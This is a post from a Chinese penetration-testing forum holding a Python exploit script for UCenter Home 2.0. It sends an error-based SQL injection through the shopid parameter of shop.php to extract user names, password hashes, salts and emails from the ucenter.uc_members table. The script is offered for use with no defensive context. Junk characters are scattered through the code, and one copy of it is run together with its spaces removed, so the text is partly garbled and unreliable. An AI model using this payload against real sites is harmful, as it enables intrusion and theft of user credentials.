找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2611|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl& g( u% M3 N6 a' {- h+ q( F3 U
2 G  \/ `8 }+ x
- J+ k$ N; b2 P! ]8 Q
#!/usr/bin/env python  + _5 O. T7 m2 N0 z1 P
8 a. Z0 Y/ S+ Y. I: t* k! v! @
import sys  ( I! n0 z" j2 _6 O
import urllib2  ) ~6 W0 I; b+ B4 D( }
import re  ' W: z  a! K( Q4 K5 C% L3 ^3 P  p

9 ~! C% x' o% }* jdef info():  
0 ]5 |2 t  z; D" K  z) \3 z2 O+ y+ _    print 'From:http://www.exploit-db.com/exploits/14997/' 1 o. `$ O9 w5 `- t/ F) c: A+ J
    print 'http://www.hake.cc/Web_loudong/'
# Q5 {- D0 I  S! n    print 'changed:qiaoy'  , m$ ]5 t) [; t" e+ Y, l6 Q
    print 'exp:'  
5 V- t& F9 x; H$ v5 h5 d* K# h    print ' ./UCenter_Home_2.0.py site'  
5 X# z$ `: X2 V! |' W( u) n& n 0 [0 L# u' J7 \* D3 A6 L3 {- v; l
def main():  4 Z& V4 u+ M- j5 Q
    if len(sys.argv) != 2:  5 O- E  m1 [, N4 @
        info()  
0 R& G5 ~# Q5 o4 F    else:  , _. v/ J/ q8 r6 i8 O/ q
        site = sys.argv[1]  
% v* Y( _! `3 r5 B0 D) \& S& i) x        if site[0:7] == 'http://':  
; _' p  A, T" x$ q5 Y) @            sitesite =site  ; N. ~# Y6 Z+ |: O4 |( \
        elif site[0:8] == 'https://':  
6 c0 l) g6 L% X( p; Z            sitesite = site  
" u- r  R, a- o5 F4 P        else:  
& U* s/ e; X5 b- ^            site = 'http://'+site    S2 h( R5 o$ |; C
        try:  : X; z" a1 |% S3 Y, Q0 O& h( u
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  ) L, r' Z1 v4 j; P
            Value = urllib2.urlopen(url).read()  
" \& g, A5 |) P) i  p! W" O            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  2 o- E7 ~0 O& p8 U- _
            hacked = Msg.split(':')  
! x4 E; J3 s, F0 r  ~            print 'Name:    '+hacked[1]  
( {  E* D  {. P; s$ z            print 'Passwd:  '+hacked[2]  1 P% v0 m6 j. z, e- q
            print 'salt:    '+hacked[3]  9 h( k" J2 D" T3 y1 Q- Y3 b
            print 'email:   '+hacked[4]  
7 I7 V' @2 @0 t        except:  ) \; v- s$ b$ N0 S8 v
            print 'Sorry,I can\'t work............'  ( ?3 S( D: c% W1 J- `. [/ y* x! S( s

7 ]; U$ P5 r( r9 H! i4 ^8 a  Aif __name__ == '__main__':  $ p) k% s/ m( w7 K
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表